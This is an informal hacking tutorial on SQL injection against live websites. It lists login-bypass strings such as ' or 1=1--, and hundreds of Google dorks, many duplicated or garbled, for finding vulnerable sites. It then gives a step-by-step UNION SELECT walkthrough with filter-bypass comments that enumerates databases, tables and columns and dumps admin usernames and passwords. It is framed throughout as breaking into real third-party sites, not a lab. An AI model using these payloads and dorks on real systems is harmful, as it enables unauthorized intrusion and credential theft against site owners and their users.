ReadMe

U: Username
P: Password

SQL

What is SQL Injection?

It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

Vulnerable admin pages

Ok so theres this part in "SQLi hacking" where you can just enter a certain input in the admin page login field and password field and you can go straight in to the admin page and do as you please with it.

Use these google dorks to help you find these admin pages.


"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"


Once you have your admin pages enter these both as your username AND password.

NOTE!: only choose one for both

Example

Username: hi' or 1=1--
Password: hi' or 1=1--
and yes enter the ' the "or" and the --as well!


hi' or 1=1-- is the entire thing, it doesnt mean enter hi' "OR" 1=1
it means hi' or 1=1-- is the entire thing, hope you guys understand this.

if that one doesnt work there are many more you can try out (that one usually works, always has for me atleast)

' or '1'='1
' or 'x'='x' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #
" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--
or 1=1--
' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


oh and another thing, sometimes you will have to enter "admin" as the username and then the password would be hi' or 1=1 -- or w.e you use.

Before we move on here are some google dorks for you to use to find SQLi vulnerable sites

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=

inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:tray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran**.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:ffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran**.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:refer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=


How to test if the website really is vulnerable to SQLi

ok so lets say that we used one of our google dorks and found many sites, so we click on one of the sites

Example
http://www.site.org/news_view.php?id=18


so now we do one of two things, or both if you want or w.e

first we put this symbol after the 18 " ' " (without quotes)

Example
http://www.site.org/news_view.php?id=18'


and/or we put and 1=2 after the 18 (blind SQLi)

Example
http://www.site.org/news_view.php?id=18 and 1=2


if we get an error like this one

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/classes/storedProcedures/GetArticleData.class.php on line 92
Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/classes/storedProcedures/GetArticleData.class.php:92) in /var/www/html/index.php on line 103
Warning: array_slice(): The first argument should be an array in /var/www/html/index.php on line 135
Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/classes/storedProcedures/GetArticleData.class.php:92) in /var/www/html/index.php on line 191
Warning: main(/var/www/html/inc/templates/): failed to open stream: Success in /var/www/html/index.php on line 195
Warning: main(): Failed opening '/var/www/html/inc/templates/' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/index.php on line 195


whether if you used the ' symbol or the 1=2 symbol than that means that the site is SQLi vulnerable ! =)

if you dont get any type of error or if you dont see anything missing from the orriginal page than that means that the page is not vulnerable and its time to find another one =(

AFTER finding a vulnerable site

Boom so now we have our vulnerable site, this is where the fun starts =)

so now what we have to do is find out all the columns in the website. to do this you must use the "ORDER BY" command

Example

http://www.site.org/news_view.php?id=18 order by 1--



so by now our original page is shown again.

so that means we have to raise the number higher because there isnt 1 column, theres more

so we keep on incrementing this number until we get an error like so...

http://www.site.org/news_view.php?id=18 order by 1-- <== no error

http://www.site.org/news_view.php?id=18 order by 2-- <== no error

http://www.site.org/news_view.php?id=18 order by 3-- <== no error

http://www.site.org/news_view.php?id=18 order by 4-- <== no error

http://www.site.org/news_view.php?id=18 order by 5-- <==ERROR


bingo!!, since we got an error when we put the number 5 that means that the highest it can go is 4, so this means the site has 4 columns =)...this is really good

NOTE: sometimes the order by command may not work so what we do is add a ' and a + sign. we put the ' after the number and a + sign after the entire command

another NOTE is that somtimes using the "--" at the end of the command may not work so you may have to put /* instead, if this is true and the /* works it means that the site is error based SQLi vuln. i will not go into that right now.
Example:
http://www.site.org/news_view.php?id=18' order by 1--+


now we need to find which one of these columns are vulnerable and where is it that we can put our sql commands to send to the server

"Union Select" Command

ok so far we have out site and its aolumns so now we use the union select command, this command is used like so

Example
http://www.site.org/news_view.php?id=18 union all select 1,2,3,4 --


ok so many times when we use this command we get an error or we dont get no type of reply back or w.e from the site

so what we do is replace union select with +/*!UNION*/+/*!SELECT*/
(this is also a way to bypass 404 errors)

Example
http://www.site.org/news_view.php?id=18+/*!UNION*/+/*!SELECT*/1,2,3,4 --


somtimes this may not work either, so what we do is put a - sign infront of the number and boom we are good to go.

Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,2,3,4 --


ok so once we use this command and the page loads you will get some numbers showing instead of the original page content.

what this means is that the numbers shown are the columns that are vulnerable so lets say the page shows the numbers 3 and 2, that means that these two columns are where our commands will go.

from this point on you should have notepad open to copy and paste all the information you get from the site, some may be important.

Finding out server version, and server user


ok so to find the server version we use the @@version command or the version(), which ever you preffer. you put these commands on one of the vulnerable columns, lets use viln. column 2.

Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,@@version,3,4 --


this should show you the server version, it should be something like

5.1.63-community-log


or something like that, youll see it. dont worry.

Lets hope that the sites you hack are over version 5 because anything below 5 means that you have to guess EVERYTHING, which can be a pain in the a**.

for blind SQLi you can do

http://www.site.org/news_view.php?id=18 and substring(@@version,1,1)=4
if this works it means the version is below 5 =(


if that doesnt work do

http://www.site.org/news_view.php?id=18 and substring(@@version,1,1)=5


if this works it means the version is 5 and above =) aka we dont have to guess!!

sometimes we have an error when we do @@version so what we do to fix this is we use the convert() the hex() and the unhex() commands

Example

http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,convert(@@version using latin1),3,4 --


OR

http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,unhex(hex(@@version)),3,4 --
so we have our version, now we get out user by doing user()


Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,user (),3,4 --


so now we have our version and user now we gota get our databases.

Getting the databases


To get our databases we put "group_concat(schema_name)" where the vuln. column goes and we put "from information_schema.schemata" at the end of the url

Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,group_concat(schema_name),3,4 from information_schema.schemata--


This will show us our databases in the site where all the information is stored.

How to get databases, version AND user all in one command

to do this you can use this command; "group_concat("DB:",database()," Version:",version()," User:",user())"

Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,group_concat("DB:",database()," Version:",version()," User:",user()),3,4--+


NOTE: if group_concat does NOT work use the command; CONCAT_WS

Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+


Oh and BTW SQLi is NOT case sensitive.
--

Getting the tables in our databases

to get the tables in our databases we change "group_concat(schema_name)"
to
group_concat(table_name)

and at the end we now put
From information_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--

Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,group_concat(table_name),3,4 From information_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() --


OR
if you have more than one database, at the end put this instead
information_schema.tables where table_schema='TABLENAME'

Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,group_concat(table_name),3,4 From information_schema.tables where table_schema='TABLENAME' --


if you get any errors trying to get tables from databases use this
concat(unhex(hex(table_name)

and

from information_schema.tables limit 0,1--

Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,concat(unhex(hex(table_name),3,4 from information_schema.tables limit 0,1--


Getting out columns from our tables

now to get our columns we change

"group_concat(table_name)" to "group_concat(column_name)"


AND

From information_schema.tables where table_schema='TABLENAME' --


to

from information_schema.tables where table_schema=0x and table_name=0x

or to

From+information_schema.columns+where+table_schema=database() –

or to

from information_schema.columns where table_name=char(ASCII value of column)--

Example
http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,group_concat(column_name),3,4 From information_SCHEMA.columns WHERE TABLE_name=char(ASCII value of column) --


Extracting data from columns

ok so now that we have our column names we have to extract the data from the columns that we want and we do this by using this command

"group_concat(("column name"),0x3a,("column name"))"

and this command

from+(table name)

NOTE: you have to put 0x3a between every column name

and of course where it says "column name" you put the name of the column you want to get the information from and where it says "table name" you put the name of the table the columns are coming from

Example using columns called "username" and "password" and table called admin

http://www.site.org/news_view.php?id=-18+/*!UNION*/+/*!SELECT*/1,group_concat(("username"),0x3a,("password")),3,4 from 'admin' --


the next page you will see all the information that you just asked for =)

Passwords aren't working

Sometimes the site is vulnerable to SQL and you can get the passwords.Then you can find the sites username and password ,but when you enter it into adminpanel then it shows "Wrong password".This can be because those usernames and passwords are there ,but aren't working.This is made by sites admin to confuse you and actually the Cpanel doesn't contain any username/password.

How to find admin page of site?

To do this search for a tool called Admin page finder and use that or you can also use Havij's page finder

or you can try and guess it yourself up to you, but it isnt hard to find admin login page.